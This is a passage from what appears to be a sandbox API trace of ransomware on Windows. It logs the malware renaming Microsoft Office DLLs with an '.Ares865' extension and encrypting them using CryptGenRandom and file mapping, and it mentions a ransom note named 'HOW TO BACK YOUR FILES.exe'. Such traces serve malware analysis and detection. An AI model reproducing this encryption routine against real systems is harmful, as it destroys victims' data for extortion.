office\\office14\\onlntcomlib.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll.ares865"), dwFlags=0x1) returned 1 [0129.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\ONLNTCOMLIB.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\onlntcomlib.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63904) returned 1 [0129.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.391] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.392] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfca0, lpName=0x0) returned 0x170 [0129.394] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfca0) returned 0x190000 [0129.397] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.398] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.398] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.398] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.399] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.399] CloseHandle (hObject=0x170) returned 1 [0129.399] CloseHandle (hObject=0x118) returned 1 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.400] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed67eb00, ftCreationTime.dwHighDateTime=0x1cacb3b, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed67eb00, ftLastWriteTime.dwHighDateTime=0x1cacb3b, nFileSizeHigh=0x0, nFileSizeLow=0x20d88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWSSUPP.DLL", cAlternateFileName="")) returned 1 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2="aoldtz.exe") returned 1 [0129.400] lstrcpyW (in: lpString1=0x2cce462, lpString2="OWSSUPP.DLL" | out: lpString1="OWSSUPP.DLL") returned="OWSSUPP.DLL" [0129.400] lstrlenW (lpString="OWSSUPP.DLL") returned 11 [0129.400] lstrlenW (lpString="Ares865") returned 7 [0129.400] lstrcmpiW (lpString1="UPP.DLL", lpString2="Ares865") returned 1 [0129.400] lstrlenW (lpString=".dll") returned 4 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2=".dll") returned 1 [0129.400] lstrlenW (lpString=".lnk") returned 4 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2=".lnk") returned 1 [0129.400] lstrlenW (lpString=".ini") returned 4 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2=".ini") returned 1 [0129.400] lstrlenW (lpString=".sys") returned 4 [0129.400] lstrcmpiW (lpString1="OWSSUPP.DLL", lpString2=".sys") returned 1 [0129.401] lstrlenW (lpString="OWSSUPP.DLL") returned 11 [0129.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL.Ares865") returned 68 [0129.401] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll.ares865"), dwFlags=0x1) returned 1 [0129.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\OWSSUPP.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\owssupp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=134536) returned 1 [0129.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.403] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.404] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.404] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.404] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x21090, lpName=0x0) returned 0x170 [0129.406] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x21090) returned 0x420000 [0129.412] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.414] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.415] CloseHandle (hObject=0x170) returned 1 [0129.415] CloseHandle (hObject=0x118) returned 1 [0129.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.415] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.416] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba4fb00, ftCreationTime.dwHighDateTime=0x1cab7d7, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3ba4fb00, ftLastWriteTime.dwHighDateTime=0x1cab7d7, nFileSizeHigh=0x0, nFileSizeLow=0x5ef90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPSLAX.DLL", cAlternateFileName="")) returned 1 [0129.416] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.416] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2="aoldtz.exe") returned 1 [0129.416] lstrcpyW (in: lpString1=0x2cce462, lpString2="PPSLAX.DLL" | out: lpString1="PPSLAX.DLL") returned="PPSLAX.DLL" [0129.416] lstrlenW (lpString="PPSLAX.DLL") returned 10 [0129.416] lstrlenW (lpString="Ares865") returned 7 [0129.416] lstrcmpiW (lpString1="LAX.DLL", lpString2="Ares865") returned 1 [0129.416] lstrlenW (lpString=".dll") returned 4 [0129.416] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2=".dll") returned 1 [0129.416] lstrlenW (lpString=".lnk") returned 4 [0129.416] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2=".lnk") returned 1 [0129.416] lstrlenW (lpString=".ini") returned 4 [0129.416] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2=".ini") returned 1 [0129.417] lstrlenW (lpString=".sys") returned 4 [0129.417] lstrcmpiW (lpString1="PPSLAX.DLL", lpString2=".sys") returned 1 [0129.417] lstrlenW (lpString="PPSLAX.DLL") returned 10 [0129.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL.Ares865") returned 67 [0129.417] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll.ares865"), dwFlags=0x1) returned 1 [0129.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\PPSLAX.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\ppslax.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.420] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=389008) returned 1 [0129.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.420] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.421] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.421] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.421] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f290, lpName=0x0) returned 0x170 [0129.422] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f290) returned 0x420000 [0129.437] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.438] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.438] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.438] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0129.442] CloseHandle (hObject=0x170) returned 1 [0129.442] CloseHandle (hObject=0x118) returned 1 [0129.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.444] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed67eb00, ftCreationTime.dwHighDateTime=0x1cacb3b, ftLastAccessTime.dwLowDateTime=0x22226890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed67eb00, ftLastWriteTime.dwHighDateTime=0x1cacb3b, nFileSizeHigh=0x0, nFileSizeLow=0x16f80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STSCOPY.DLL", cAlternateFileName="")) returned 1 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2="aoldtz.exe") returned 1 [0129.444] lstrcpyW (in: lpString1=0x2cce462, lpString2="STSCOPY.DLL" | out: lpString1="STSCOPY.DLL") returned="STSCOPY.DLL" [0129.444] lstrlenW (lpString="STSCOPY.DLL") returned 11 [0129.444] lstrlenW (lpString="Ares865") returned 7 [0129.444] lstrcmpiW (lpString1="OPY.DLL", lpString2="Ares865") returned 1 [0129.444] lstrlenW (lpString=".dll") returned 4 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2=".dll") returned 1 [0129.444] lstrlenW (lpString=".lnk") returned 4 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2=".lnk") returned 1 [0129.444] lstrlenW (lpString=".ini") returned 4 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2=".ini") returned 1 [0129.444] lstrlenW (lpString=".sys") returned 4 [0129.444] lstrcmpiW (lpString1="STSCOPY.DLL", lpString2=".sys") returned 1 [0129.444] lstrlenW (lpString="STSCOPY.DLL") returned 11 [0129.445] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL.Ares865") returned 68 [0129.445] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll.ares865"), dwFlags=0x1) returned 1 [0129.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSCOPY.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stscopy.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.447] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94080) returned 1 [0129.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.447] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.449] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17280, lpName=0x0) returned 0x170 [0129.450] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17280) returned 0x190000 [0129.455] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.456] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.456] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0129.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0129.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.456] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.457] CloseHandle (hObject=0x170) returned 1 [0129.457] CloseHandle (hObject=0x118) returned 1 [0129.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0129.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0129.458] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd45f3a00, ftCreationTime.dwHighDateTime=0x1cacb3b, ftLastAccessTime.dwLowDateTime=0x22226890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd45f3a00, ftLastWriteTime.dwHighDateTime=0x1cacb3b, nFileSizeHigh=0x0, nFileSizeLow=0x11780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STSUPLD.DLL", cAlternateFileName="")) returned 1 [0129.458] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0129.458] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2="aoldtz.exe") returned 1 [0129.458] lstrcpyW (in: lpString1=0x2cce462, lpString2="STSUPLD.DLL" | out: lpString1="STSUPLD.DLL") returned="STSUPLD.DLL" [0129.458] lstrlenW (lpString="STSUPLD.DLL") returned 11 [0129.458] lstrlenW (lpString="Ares865") returned 7 [0129.459] lstrcmpiW (lpString1="PLD.DLL", lpString2="Ares865") returned 1 [0129.459] lstrlenW (lpString=".dll") returned 4 [0129.459] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2=".dll") returned 1 [0129.459] lstrlenW (lpString=".lnk") returned 4 [0129.459] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2=".lnk") returned 1 [0129.459] lstrlenW (lpString=".ini") returned 4 [0129.459] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2=".ini") returned 1 [0129.459] lstrlenW (lpString=".sys") returned 4 [0129.459] lstrcmpiW (lpString1="STSUPLD.DLL", lpString2=".sys") returned 1 [0129.459] lstrlenW (lpString="STSUPLD.DLL") returned 11 [0129.459] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL.Ares865") returned 68 [0129.459] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll.ares865"), dwFlags=0x1) returned 1 [0129.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\STSUPLD.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\stsupld.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0129.461] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71552) returned 1 [0129.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0129.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0129.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0129.461] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0129.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0129.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.462] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11a80, lpName=0x0) returned 0x170 [0129.464] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11a80) returned 0x190000 [0129.469] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0129.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0129.470] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0129.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0129.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0129.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0129.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0129.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0129.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0129.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0129.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0129.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0129.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0129.470] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0129.471] CloseHandle (hObject=0x170) returned 1 [0129.471] CloseHandle (hObject=0x118) returned 1 [0129.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0129.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: 